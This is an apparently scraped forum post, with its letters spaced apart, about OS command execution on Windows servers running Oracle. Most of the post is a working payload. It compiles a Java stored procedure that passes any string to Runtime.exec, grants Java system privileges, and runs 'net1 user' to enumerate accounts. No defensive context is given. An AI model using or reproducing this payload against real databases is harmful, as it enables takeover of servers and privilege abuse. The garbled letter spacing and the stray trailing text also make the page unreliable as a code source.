[20846] 2017-08-09_WINDOWS服务器ORACLE命令执行漏洞

文档创建者:s7ckTeam
浏览次数:14
最后更新:2025-01-18
2017-08-09_WINDOWS服务器ORACLE命令执行漏洞 W I N D O W S   O R A C L E   l e m o n   L e m o n S e c   2 0 1 7 - 0 8 - 0 9 j a v a 1 , c r e a t e   o r   r e p l a c e   a n d   c o m p i l e   j a v a   s o u R C e   n a m e d   " u t i l "   a s i m p o r t   j a v a . i o . * ;   i m p o r t   j a v a . l a n g . * ; p u b l i c   c l a s s   u t i l   e x t e n d s   O b j e c t { p u b l i c   s t a t i c   i n t   R u n T h i s ( S t r i n g   a r g s ) { R u n t i m e   r t   =   R u n t i m e . g e t R u n t i m e ( ) ; i n t   R C   =   - 1 ; t r y { P r o c e s s   p   =   r t . e x e c ( a r g s ) ; i n t   b u f S i z e   =   4 0 9 6 ; B u f f e r e d I n p u t S t r e a m   b i s   = n e w   B u f f e r e d I n p u t S t r e a m ( p . g e t I n p u t S t r e a m ( ) ,   b u f S i z e ) ; i n t   l e n ; b y t e   b u f f e r [ ]   =   n e w   b y t e [ b u f S i z e ] ; / /   E c h o   b a c k   w h a t   t h e   p r o g r a m   s p i t   o u t w h i l e   ( ( l e n   =   b i s . r e a d ( b u f f e r , 0 , b u f S i z e ) )   ! =   - 1 ) S y s t e m . o u t . w r i t e ( b u f f e r , 0 , l e n ) ; R C   =   p . w a i t F o r ( ) ; } c a t c h   ( E x c e p t i o n   e ) { e . p r i n t S t a c k T r a c e ( ) ; R C   =   - 1 ; } f i n a l l y { r e t u r n   R C ; } } } /  
2 , c r e a t e   o r   r e p l a c e f u n c t i o n   R U N _ C M z ( p _ c m d   i n   v a r c h a r 2 )   r e t u r n   n u m b e r a s l a n g u a g e   j a v a n a m e   ' u t i l . R u n T h i s ( j a v a . l a n g . S t r i n g )   r e t u r n   i n t e g e r ' ; / 3 , c r e a t e   o r   r e p l a c e   p r o c e d u r e   R C ( p _ c m d   i n   v a r C h a r ) a s x   n u m b e r ; b e g i n x   : =   R U N _ C M z ( p _ c m d ) ;   e n d ; /   4 , v a r i a b l e   x   n u m b e r ; s e t   s e r v e r o u t p u t   o n ;
e x e c   d b m s _ j a v a . s e t _ o u t p u t ( 1 0 0 0 0 0 ) ; g r a n t   j a v a s y s p r i v   t o   s y s t e m ; g r a n t   j a v a u s e r p r i v   t o   s y s t e m ; e x e c   : x : = r u n _ c m z ( ' n e t 1   u s e r ' ) ; a a a
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则